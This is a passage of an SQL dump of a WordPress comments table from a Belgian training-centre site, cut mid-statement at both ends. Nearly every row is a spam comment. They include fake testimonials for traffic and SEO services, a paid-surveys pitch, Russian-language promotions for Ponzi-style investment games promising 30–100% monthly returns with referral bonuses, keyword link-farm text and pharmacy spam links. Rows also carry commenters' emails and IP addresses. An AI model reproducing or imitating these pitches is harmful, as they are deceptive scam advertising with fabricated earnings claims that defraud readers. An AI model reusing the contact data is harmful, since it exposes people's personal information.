(79, 1, 'Mckayla', 'obgurlojo@gmail.com', 'http://crown.im/1581', '23.81.201.84', '2014-02-23 05:20:21', '2014-02-23 05:20:21', 'This is a message to the webmaster. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your traffic to your website: http://iam.at/1a3 They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(80, 1, 'Surveys', 'linda-lency1986@htomail.com', 'http://money-with-surveys.com/start.html', '178.137.162.244', '2014-02-23 13:13:27', '2014-02-23 13:13:27', 'Hi www.crosstrainingcenter.be admin, \r\nIf you want to make $20-$50/hour and up to $3000/month working at \r\nhome part-time then this is the most important message  you’re ever going to read... \r\n \r\nIt may sound hard to believe, but it\'s true.  There are thousands of companies out there who are willing to pay for your opinions regarding their products.  This is an important part of product research, and they rely on people just like you for your honest opinion! \r\n \r\nImagine getting paid for doing simple things like: \r\n \r\n- Take short surveys about new cars that are coming out soon \r\n- Give your opinion about new clothing and shoe designs \r\n- Trying out new menu items from popular restaurants \r\nBut here\'s a problem, it\'s very hard to find out best survey site and you probably can waste too much time, \r\nbut I just stumbled up  website http://money-with-surveys.com/start.html \r\nwhere they sorted the best paying survey site DB allowing single dad making $3000/month \r\n \r\nClick Here To read this amazing  story : \r\nhttp://money-with-surveys.com/start.html \r\n \r\n \r\nYour friend \r\nLinda', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0),
(81, 1, 'Susan', 'sqlyfns@gmail.com', 'http://regisztralj.be/tj', '23.81.201.92', '2014-02-25 02:53:59', '2014-02-25 02:53:59', 'I came to your page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try their service for free. I managed to get over 300 targeted visitors to day to my site. Visit them today: http://monurl.ca/85kk', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(82, 1, 'Swayna', 'leszckbqlhk@gmail.com', 'http://ow.ly/sXRuL', '23.81.201.74', '2014-03-01 20:23:16', '2014-03-01 20:23:16', 'This is a message to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your traffic to your site: http://regisztralj.be/tj They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0);
INSERT INTO `www2_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(83, 1, 'GoldenBlon', 'lazarevatyu@yandex.com', 'http://golden-birds.biz/', '95.28.255.143', '2014-03-07 16:31:53', '2014-03-07 16:31:53', 'Golden Birds - интеллектуально-ролевый онлайн симулятор с выводом денег. Зарабатывай на своих яйцах каждые 10 минут! \r\nРегистрация: http://golden-birds.biz/ \r\n \r\n1. Купите птиц, они будут нести вам яйца. \r\n2. Яйца будут накапливаться на складе, собирайте их. \r\n3. Продавайте яйца и получайте за них серебро. \r\n4. Обменивайте серебро на реальные деньги, либо покупайте больше птиц, чтобы они приносили вам еще больше прибыли! \r\n \r\nПримущества игры: \r\n1. Резервный фонд \r\n2. Окупаемость \r\n3. Выгодные условия \r\n4. Стабильность \r\n5. Круглосуточная поддержка \r\n6. Прозрачность системы \r\n \r\nТекущие акции: \r\nДо 12.03.2014 бонус при любом пополнении +200% \r\n2 синих птицы, при пополнении свыше 500 руб. \r\n1 красная птица, при пополнении свыше 1500 руб. \r\n \r\nЕжедневный бонус: \r\nСумма бонуса генерируется случайно от 10 до 100 серебра. \r\n \r\nПартнерская программа: \r\nПриглашайте в игру своих друзей и знакомых, Вы будете получать 30% от каждого пополнения баланса приглашенным Вами \r\nчеловеком. Доход ни чем не ограничен. Даже несколько приглашенных могут принести вам более 100 000 серебра. \r\n \r\nКонкурсы рефералов: \r\nКонкурс рефералов № 8 с общим призовым фондом 45000 руб. \r\n \r\nСтарт конкурса: 10.02.2014 в 18:58:07 \r\nЗавершение:     11.03.2014 в 18:58:02 \r\n \r\nПризовые места: \r\n1 - 30000 RUB \r\n2 - 10000 RUB \r\n3 - 5000 RUB \r\n \r\nЦены на птиц и их окупаемость: \r\nПтица----------------Стоимость------------Доход---------Окупаемость \r\nЗелёная----------------1 руб----------0,01 руб\\день--------59 дней \r\nЖёлтая----------------10 руб----------0,16 руб\\день--------59 дней \r\nКоричневая------------50 руб----------0,88 руб\\день--------56 дней \r\nСиняя----------------250 руб----------4,60 руб\\день--------54 дней \r\nКрасная-------------1000 руб---------23,16 руб\\день--------43 дней \r\n \r\nСтатистика проекта: \r\nВсего участников:    100081 \r\nНовых за 24 часа:    2021 \r\nВыплачено всего:     5041902.34 руб. \r\nРезерв проекта:      10990404.23 руб. \r\nПроекту пошел:       143 - й день \r\n \r\nигры с возможностью вывода денег отзывы \r\nигра шахта с выводом денег отзывы \r\nтоп игр с выводом денег отзывы \r\nпроверенные игры с выводом денег отзывы \r\nфермандия игра с выводом денег отзывы', 0, '0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.19 (KHTML, like Gecko) Chrome/25.0.1323.1 Safari/537.19', '', 0, 0),
(84, 1, 'PharaohsBlon', 'marysmirnofff@yandex.com', 'http://empire-pharaohs.com/', '128.72.120.170', '2014-03-10 01:21:28', '2014-03-10 01:21:28', 'Empire Of The Pharaohs - экономическия игра в реальном времени с выводом средств. \r\n \r\nДля тех кто играет в экономические игры и не только. Регистрация: http://empire-pharaohs.com/ \r\n \r\nВсем привет, рад представить Вам свежую экономическую игру с выводом средств \"Империя Фараонов\". \r\nПлюсы: отсутствие платежных баллов. Вывод средств ничем не ограничен. Авто-выплаты на PAYEER. \r\n \r\nИмперия Фараонов - экономическия игра в реальном времени с выводом средств. Окунитесь в атмосферу древнего Египта, создайте собственную Империю Фараонов, которая будет давать Вам реальные деньги. \r\n \r\nВ этой ролевой игре Вам предоставляется управлять Империей Фараонов. Преобретайте рабов, ремесленников, воинов, жрецов и фараонов. Каждый персонаж вырабатывает определенную продукцию, которую можно обменять и выручить за нее золото. Чем он дороже, тем больше продукции он вырабатывает. \r\n \r\nЗолото можно продать на денежные средства и вывести из игры на свой электронный счет. Можно покупать безконечное количество персонажей. Все персонажи и их продукция не портятся и никуда не исчезают. Сбор продукции осуществляется без потерь и ограничений по срокам. Автоматический ввод в игру и вывод денег на Ваш счет. Маленькая минималка. \r\n \r\nМожно играть без вкладов. При регистрации мы отдаем всем Раба в подарок. Ежедневные бонусы, лотерея, конкурсы. Так же присутствует реферальная программа. Приглашайте в игру своих близких и знакомых. За каждое пополнение баланса партнерами, Вы будете получать 20% от суммы их пополнения. Ваша Империя будет приносить прибыль вечно. \r\n \r\nСтатистика проекта: \r\nВсего жителей:	          3580 чел. \r\nНовых за сутки:	          92 чел. \r\nПродали золота на:	  6922.34 RUB \r\nКупили золота на:         73119.44 RUB \r\nВозраст империи:	  37-й день \r\n \r\nЦены и расчет дохода: \r\nПерсонаж------------Стоимость---------Прибыль------Окупаемость \r\nРаб------------------30 руб--------0,24 руб.день------125 дней \r\nРемесленник----------150 руб-------1,44 руб.день------104 дней \r\nВоин-----------------300 руб-------3,60 руб.день-------83 дней \r\nЖрец-----------------600 руб-------8,64 руб.день-------69 дней \r\nФараон--------------1200 руб-------19,44 руб.день------61 дней \r\n \r\nНе однократно уже получены выплаты. Всех кого заинтересовало мое письмо, могут зарегистрироваться на проекте \r\nи посмотреть все своими глазами, а при желании, начать играть. Всем приятной игры и хорошего настроения. \r\n \r\nинтернет игры с выводом денег отзывы \r\nлучшая игра с выводом денег отзывы \r\nигра бобер с выводом денег отзывы \r\nигра бобры с выводом денег отзывы \r\ngarden игра с выводом денег отзывы', 0, '0', 'Opera/9.80 (Windows NT 5.1; Edition Ukraine Local) Presto/2.12.388 Version/12.10', '', 0, 0),
(85, 1, 'seo vps', '*@gmail.com', 'http://www.webtrafficsoftware.info', '87.238.209.234', '2014-03-11 10:50:37', '2014-03-11 10:50:37', 'Want to rank your website? http://www.webtrafficsoftware.info', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(86, 1, 'Pauline', 'tgrcshvdxl@gmail.com', 'http://tiny6.com/ldia', '23.81.201.92', '2014-03-12 03:01:30', '2014-03-12 03:01:30', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://pay4by.cc/rnwh', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(87, 1, 'ZogNam', '343ewcf3pdes@gmail.com', 'http://xxioeoieejjwbb1w.com', '91.200.14.96', '2014-03-13 08:52:09', '2014-03-13 08:52:09', '?I used to be more than happy to search out this internet-site.I needed to thanks on your time for this wonderful learn!! I definitely having fun with every little little bit of it and I\'ve you bookmarked to check out new stuff you weblog post.', 0, '0', 'Opera/9.80 (Windows NT 6.1; Edition Yx) Presto/2.12.388 Version/12.11', '', 0, 0),
(88, 1, 'extreme traffic', 'linda-fericsen@hotmail.com', 'http://extreme-seo-traffic.com', '178.137.92.70', '2014-03-19 09:01:51', '2014-03-19 09:01:51', 'hi www.crosstrainingcenter.be owner discovered your site via search engine but it was hard to find and I see you could have more visitors because there are not so many comments yet. I have discovered website which offer dramatically increase laser targeted traffic from search engines to your site http://extreme-seo-traffic.com they claim they managed to get close to 4000 visitors/day using their services you could also get lot more targeted traffic from search engines as you have now. I used their services and got significantly more visitors to my website. Hope this helps :) They offer most cost effective services to increase website traffic at this website http://extreme-seo-traffic.com \r\nTo your success your friend \r\nLinda', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36 OPR/20.0.1387.64', '', 0, 0),
(89, 1, 'extreme traffic', 'sophia.allen89@hotmail.com', 'http://massive-auto-traffic.com', '46.118.116.0', '2014-04-01 09:17:58', '2014-04-01 09:17:58', 'After getting more than 10000 visitors/day to my website I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://massive-auto-traffic.com \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://massive-auto-traffic.com \r\nBest regards \r\nYour friend \r\nSophia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0', '', 0, 0),
(90, 1, 'Jennifer', 'lwazhmsr@gmail.com', 'http://abrevia.retialis.net/158g', '23.81.201.89', '2014-04-03 05:51:35', '2014-04-03 05:51:35', 'Are you tired of your site not giving you the traffic you hoped it would like I once was? If so I am spreading the word about my recent experience with an SEO service that has taken my website to the next level! Their SEO package is a must-have for websites of any age and the best part is that their work is Penguin and Panda proof. I wasn\'t sure at first but since they offer a seven day free trial I signed up. Now my site is on the first page of Google and getting a lot of search engine traffic! Visit them today: http://url.sorgol.com/3s', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(91, 1, 'Jennifer', 'awqextezxwe@gmail.com', 'http://bsand.in/-gi5i', '23.81.201.74', '2014-04-04 20:40:56', '2014-04-04 20:40:56', 'In the competitive market of Google results owning and maintaining a website can be difficult and time consuming. As webmasters we all could use more visitors and increased Google rankings, but we must also be wary of the penguin and panda updates that Google has recently introduced. Luckily I have found an SEO service that is penquin and panda proof, that is will not incur penalties based on the new algorithm updates. They also offer a seven day free trial to try the product out and I saw a dramatic increase in my traffic once I signed up. In fact I am so happy with their service I am spreading the word to all of the webistes I visit frequently. Check them out here: http://bsand.in/-gi5i', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(92, 1, 'Moiffitagoaro', 'tmsnewtmsnew@gmail.com', 'http://kpdstroy.ru/bolars-kley-plitochnyy/', '94.127.144.225', '2014-04-06 11:16:57', '2014-04-06 11:16:57', '<a href=\"http://kpdstroy.ru/bolars-kley-plitochnyy/\" / rel=\"nofollow\"> \r\nhttp://s017.radikal.ru/i416/1310/55/4cdd574b932d.jpg \r\nhttp://s017.radikal.ru/i443/1310/be/5d33f485a4b8.jpg</a> \r\n \r\nTegs: штукатурка боларс короед  боларс клей плиточный метро бульвар дмитрия донского  <b>боларс финишная super</b>. \r\n \r\nболарс двери входные  боларс клей плиточный район свиблово  \r\n<i>боларс стяжка основа бт  боларс клей плиточный район северный </i> \r\n<b>боларс structure 0 5  боларс клей плиточный юзао </b> \r\n<a href=\"http://kpdstroy.ru/bolars-kley-plitochnyy/\" / rel=\"nofollow\">боларс клей плиточный район ново-переделкино </a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.13014 YaBrowser/13.12.1599.13014 Safari/537.36', '', 0, 0),
(93, 1, 'FishSn', 'galaluda@yandex.com', 'http://fish-empire.net/', '95.25.1.39', '2014-04-06 17:33:07', '2014-04-06 17:33:07', 'FISH-EMPIRE.NET - игра рпг с выводом денег. Запуск игры 31.03.2014. \r\n \r\nДля ознакомления кликните по ссылке: http://fish-empire.net/ \r\n \r\nНаши Особенности: Свободная статистика - Вы всегда будете знать о текущем состоянии золота в игре. В системе не содержится никаких запретов для обмена золота. \r\n \r\nВыгодные условия - возможность во много раз приумножить свои вклады. Мы обещаем от 30% до 100% ежемесячно. \r\n \r\nРост капитала проекта - за счет влива средств на рекламу и привлечения в игру новых участников - пользователями, работающих по партнерской програме. Быстрая поддержка на приветном форуме. Уникальная среда и ещё разнообразие других плюсов. \r\n \r\nО проекте: FISH-EMPIRE.NET - игра рпг с выводом денег. Погрузитесь в среду экономической онлайн игры и создайте свою Рыбную Империю, которая всегда будет приносить Вам настоящие деньги. \r\n \r\nВ данной игре Вам нужно приобретать всяких рыб. Каждая рыба дает икру, которую можно продать на золото. Золото можно выручить за настоящие средства и снять из проекта на свои электронные счета. \r\n \r\nВсе рыбы производят определенное количество икры, чем они больше стоят, тем икры производят больше. Вы можете преобретать любое их количество, у рыб нет срока годности, они никуда не исчезнут и будут давать Вам икру стабильно. Сбор икры осуществляется без потерь и препятствий по времени. \r\n \r\nНачинай Игру: Начать играть можно без затрат. При регистрации мы дарим Всем Щуку. Каждый день бонусы, лотерея, конкурсы, акции. Так же существует партнерская програма. Призывайте в игру своих друзей и близких. \r\n \r\nЗа каждое пополнение баланса партнерами, Вы будете иметь 30% от суммы их инвестиций. Авто -  ввод в игру и вывод средств на Ваш электронный счет. Низкая минималка на Payeer, всего 3 RUB. Ваша Рыбная Империя будет давать средства каждый день. \r\n \r\nКурс игрового инвентаря: 100 гр. икры = 1 гр. золота. 100 гр. золота = 1 RUB. \r\n \r\nРыбы-------------------Стоимость----------------Доход в день-----------Окупаемость \r\nЩука--------------------90 RUB--------------------1 RUB--------------------90 дней \r\nМинтай-----------------270 RUB------------------3,6 RUB--------------------75 дней \r\nЛосось-----------------810 RUB------------------13,5 RUB-------------------60 дней \r\nОсетр------------------2430 RUB-----------------54 RUB---------------------45 дней \r\nБелуга-----------------7290 RUB-----------------243 RUB--------------------30 дней', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36', '', 0, 0),
(94, 1, 'Abby', 'cindcisamt@gmail.com', 'http://jasonchua.me/qcnaz', '23.81.201.82', '2014-04-06 23:09:20', '2014-04-06 23:09:20', 'Are you tired of your site not giving you the results you hoped it would like I once was? If so I am spreading the word about my recent experience with an SEO company that has taken my business to the next level! Their SEO service is a must-have for websites of any age and the best part is that their work is Penguin and Panda proof. I was skeptical at first but since they offer a seven day free trial I tried it. Now my site is on the first page of Google and getting tons of search engine traffic! Visit them today: http://url.sorgol.com/3s', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(95, 1, 'Abby', 'nepvtq@gmail.com', 'http://s-url.me/c30', '23.81.201.90', '2014-04-09 08:50:36', '2014-04-09 08:50:36', 'Hello web admin, I finally found your website after going through many different pages of search results on Google. I am sure you do not get a lot of organic search traffic as you are not on the the first page of search results. I found a company that can fix your search traffic problem and get your website to the first page:http://url.sorgol.com/3s As you know, organic search traffic is the most valuable and targeted traffic on the internet and I am getting close to 1,000 visitors per day using their service and that is why I am recommending them to you. I wish you success in the future with your website!', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(96, 1, 'john', 'john@hotmail.com', 'http://www.QS3PE5ZGdxC9IoVKTAPT2DBYpPkMKqfz.com', '62.210.142.7', '2014-04-09 23:49:11', '2014-04-09 23:49:11', 'TvRAfb http://www.QS3PE5ZGdxC9IoVKTAPT2DBYpPkMKqfz.com', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(97, 1, 'FishLoda', 'innsolowiewa@yandex.com', 'http://fish-empire.net/', '128.72.3.229', '2014-04-17 12:24:21', '2014-04-17 12:24:21', 'РЫБНАЯ ИМПЕРИЯ - online игра с выводом денег. Старт системы 31.03.2014. \r\n \r\nДля регистрации перейдите по ссылке: http://fish-empire.net/ \r\n \r\nНаши Привелегии: Открытая статистика - Вы всегда будете осведомлены о реальном состоянии золота в игре. В системе нет никаких санкций для продажи золота. \r\n \r\nВыгодное сотрудничество - доступность во много раз приумножить свои инвестиции. Мы обещаем от 30% до 100% ежемесячно. \r\n \r\nУвеличение резерва игры - за счет выделения денег на рекламу и приглашения в игру новых игроков - участниками, участвующих по партнерской програме. Оперативная поддержка на приветном форуме. Уникальная среда и ещё множество других особенностей. \r\n \r\nОб Игре: РЫБНАЯ ИМПЕРИЯ - online игра с выводом денег. Войдите в среду экономической онлайн игры и возведите свою Рыбную Империю, которая каждый день будет приносить Вам реальные деньги. \r\n \r\nВ данной игре Вам предстоит приобретать разных рыб. Любая рыба производит икру, которую можно выручить на золото. Золото можно выручить за реальные деньги и вывести из проекта на свои электронные кошельки. \r\n \r\nЛюбые рыбы дают условное кол-во икры, чем они больше стоят, тем икры дают больше. Вы можете преобретать любое их кол-во, у рыб нет срока годности, они никуда не исчезнут и будут метать Вам икру всегда. Сбор икры происходит без потерь и ограничений по срокам. \r\n \r\nНачинай Играть: Начать играть можно без затрат. При регистрации мы дарим Всем Щуку. Каждый день бонусы, лотерея, конкурсы, акции. Так же существует реферальная програма. Приводите в систему своих знакомых и родных. \r\n \r\nЗа каждое пополнение баланса партнерами, Вы будете иметь 30% от суммы их пополнения. Авто -  ввод в систему и вывод денег на Ваш электронный кошелек. Мизерная минималка на Паеер, всего 3 RUB. Ваша Рыбная Империя будет давать прибыль всегда. \r\n \r\nКурс игрового инвентаря: 100 гр. икры = 1 гр. золота. 100 гр. золота = 1 RUB. \r\n \r\nРыбы-------------------Стоимость----------------Доход в день-----------Окупаемость \r\nЩука--------------------90 RUB--------------------1 RUB--------------------90 дней \r\nМинтай-----------------270 RUB------------------3,6 RUB--------------------75 дней \r\nЛосось-----------------810 RUB------------------13,5 RUB-------------------60 дней \r\nОсетр------------------2430 RUB-----------------54 RUB---------------------45 дней \r\nБелуга-----------------7290 RUB-----------------243 RUB--------------------30 дней', 0, '0', 'Opera/9.80 (Windows NT 6.1; Win64; x64) Presto/2.12.388 Version/12.16', '', 0, 0),
(98, 1, 'Richardzek', 'e.gamanowa2014@yandex.ru', '', '128.68.153.35', '2014-04-21 03:43:23', '2014-04-21 03:43:23', 'Make $600 Per Day Working Online \r\nit\'s just \r\nhttp://trustmid.ru/', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0', '', 0, 0),
(99, 1, 'Moiffitagoaro', 'tmsnewtmsnew@gmail.com', 'http://tm-stroi.ru/dekorativnaya-shtukaturka.html', '183.207.228.12', '2014-04-26 04:31:34', '2014-04-26 04:31:34', 'http://tm-stroi.ru/dekorativnaya-shtukaturka.html  -  \r\nhttp://s017.radikal.ru/i416/1310/55/4cdd574b932d.jpg \r\nhttp://s017.radikal.ru/i443/1310/be/5d33f485a4b8.jpg \r\n \r\nTegs: декоративная штукатурка валпаинт  декоративная штукатурка метро дубровка  декоративная штукатурка барнаул. \r\n \r\nдекоративная штукатурка velluto  декоративная штукатурка район медведково северный  \r\nдекоративная штукатурка шпателем  декоративная штукатурка район бибирево  \r\nдекоративная штукатурка короед фото  декоративная штукатурка район крылатский  \r\nhttp://tm-stroi.ru/dekorativnaya-shtukaturka.html  - декоративная штукатурка метро митино', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36', '', 0, 0),
(100, 1, 'Moiffitagoaro', 'tmsnewtmsnew@gmail.com', 'http://tm-stroi.ru/dekorativnaya-shtukaturka-bolars.html', '94.127.144.225', '2014-05-16 10:26:26', '2014-05-16 10:26:26', '<a href=\"http://tm-stroi.ru/dekorativnaya-shtukaturka-bolars.html\" rel=\"nofollow\"> \r\nhttp://s017.radikal.ru/i416/1310/55/4cdd574b932d.jpg \r\nhttp://s017.radikal.ru/i443/1310/be/5d33f485a4b8.jpg</a> \r\n \r\nTegs: боларс декор ёлки  декоративная штукатурка боларс район северный  <b>боларс декор зу</b>. \r\n \r\nболарс декор яndex  декоративная штукатурка боларс район дегунино западный  \r\n<i>боларс декор маша и медведь 2013  декоративная штукатурка боларс метро сокол </i> \r\n<b>боларс декор ёй  декоративная штукатурка боларс метро студенческая </b> \r\n<a href=\"http://tm-stroi.ru/dekorativnaya-shtukaturka-bolars.html\" rel=\"nofollow\">декоративная штукатурка боларс метро тургеневский </a>', 0, '0', 'Opera/9.80 (Windows NT 6.1; Win64; x64) Presto/2.12.388 Version/12.16', '', 0, 0),
(101, 1, 'viktoraleksandrovich', 'viktoraleksandrovich7@gmail.com', 'http://antiagingclinic.ru', '178.137.95.66', '2014-05-31 17:30:01', '2014-05-31 17:30:01', 'http://antiagingclinic.ru - Древо Жизни', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0', '', 0, 0),
(102, 1, 'EllaBix', 'ms.ella.jackson99667@hotmail.com', 'http://get-huge-autopilot-traffic.com', '178.137.163.60', '2014-06-04 23:08:20', '2014-06-04 23:08:20', 'After getting more than 10000 visitors/day to my website I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://get-huge-autopilot-traffic.com \r\n \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://get-huge-autopilot-traffic.com \r\n \r\nBest regards \r\nYour friend \r\nElla', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36 OPR/19.0.1326.59', '', 0, 0),
(103, 1, 'ThomasEl', 'igorp.petroff2014@yandex.ru', 'http://financeandlittlehobby.blog.com/', '77.66.186.213', '2014-06-10 10:06:30', '2014-06-10 10:06:30', 'Distinguish Spanking New Spring/Summer Picks on Discount By Nordstrom Promo Code 2014 Lulus Coupon Codes Offer - How Spring Folds in to Summer?  \r\nhttp://loans-for.com/check-out-coupondevta-before-you-even-visit-any.html - Check Out CouponDevta Before You Even Visit any Shopping Site  \r\n-&gt;       Would you what\'s disadvantage of internet? How\'s it through or happens out of the blue without providing you with any hint? It\'s defiantly this type of hindrance that effects all very q...\r\n-&gt;       Are you currently fashion obsessed? Like to liven up and flaunt around your hot favorite star does? Would you deem over being a style icon yourself? Well for those who have these kinds...\r\n \r\nhttp://financeandlittlehobby.blog.com/  \r\nSheltering Personal Information at Ease with Life Lock Coupons Lulus Coupon Codes Offer - How Spring Folds in to Summer?  \r\nhttp://loans-for.com/how-to-use-coupon-codes-to-save-money-on-online.html - How to Use Coupon Codes to Save Money on Online Shopping?  \r\n-&gt;       Cat\'s eyes and blond curls may be the fashion leader componen excellence. The lady requests parties with crazy and natural looks. The design and style leaves you special. Well for a myr...\r\n-&gt;       Are you currently jaded from the &quot;same&quot; outfit or accessory transported every second time? You\'re also bored of these two different prices from the brand to street that baffle...\r\n \r\nhttp://financeandlittlehobby.blog.com/', 0, '0', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36', '', 0, 0),
(104, 1, 'MichaelWat', 'projabnabest1971@yandex.com', 'http://www.purchase-online-easy.com/skyrim-where-buy-land-falkreath.html', '94.127.144.225', '2014-06-19 01:35:19', '2014-06-19 01:35:19', 'Buy bongs online cheap \r\n<a href=\"http://www.purchase-online-easy.com/buy-fioricet-online-cheap-overnight-shipping.html\" rel=\"nofollow\">Buy fioricet online cheap overnight shipping</a> \r\nhttp://www.purchase-online-easy.com/muscat-buy-and-sell-phones.html \r\nOne of the most popular reasons why company meetings have been known to have gone astray is because people tend wander off topic. They squander away precious time digressing rather than discussing, which dissolves the entire point of the meeting. Here are a few ways in which company meetings can be bettered so that they meet the standards that are required of them. \r\nAwesome stuff to buy online \r\n<a href=\"http://www.purchase-online-easy.com/cheap-bicycle-sale-singapore.html\" rel=\"nofollow\">Cheap bicycle sale singapore</a> \r\nhttp://www.purchase-online-easy.com/looking-buy-house.html \r\nHi, this is Ashish here and would like to share with you about Diamond Powder and Diamond Paste where you can know more about Diamond Dressers . Read the full... \r\nSkateboard truck buying guide \r\n<a href=\"http://www.purchase-online-easy.com/bid-buy-sold-auctions-sydney.html\" rel=\"nofollow\">Bid buy sold auctions sydney</a> \r\nhttp://www.purchase-online-easy.com/online-group-buying-sites-manila.html \r\nNicole Bruce is associated with Hoxton Industries, one of the best packaging companies of Sydney, offering reliable document shredding, destruction and warehouse and storage services in Sydney . Read the full...', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36', '', 0, 0),
(105, 1, 'Donaldsi', 'donaldPync@gmail.com', 'http://www.trahnu.ru/', '95.79.119.9', '2014-06-24 10:58:09', '2014-06-24 10:58:09', 'What matchless topic', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36', '', 0, 0),
(106, 1, 'mirakaraseva', 'mira.karaseva@gmail.com', 'http://antiagingclinic.ru/havinson.html', '134.249.53.58', '2014-06-30 19:43:31', '2014-06-30 19:43:31', 'http://antiagingclinic.ru/havinson.html - Хавинсон Владимир Хацкелевич', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0', '', 0, 0),
(107, 1, 'MichaelWat', 'projabnabest1971@yandex.com', 'http://www.purchase-online-easy.com/best-place-buy-salvia-online-gram.html', '94.127.144.225', '2014-07-10 10:38:50', '2014-07-10 10:38:50', 'Buy and sell guns on craigslist \r\n<a href=\"http://www.purchase-online-easy.com/how-buy-pets-sims-pets.html\" rel=\"nofollow\">How to buy pets in sims 3 pets</a> \r\nhttp://www.purchase-online-easy.com/buy-autoflowering-cannabis-seeds.html \r\nBill Huang is associated with Eapparel, a company offering high-performance clothing and promotional products in Australia. The services &amp; products of Eapparel include Cat caterpillar boots, Van heusen shirt and Jb\'s workwear and much more. Read the full... Once you have made the decision to buy carbon bike wheels, it is a good idea to shop around in order to get the best deal for your preferred wheels. One of your options would be to buy carbon bike wheels online. There are many bike suppliers who will give you the option of purchasing your wheels online, all from the 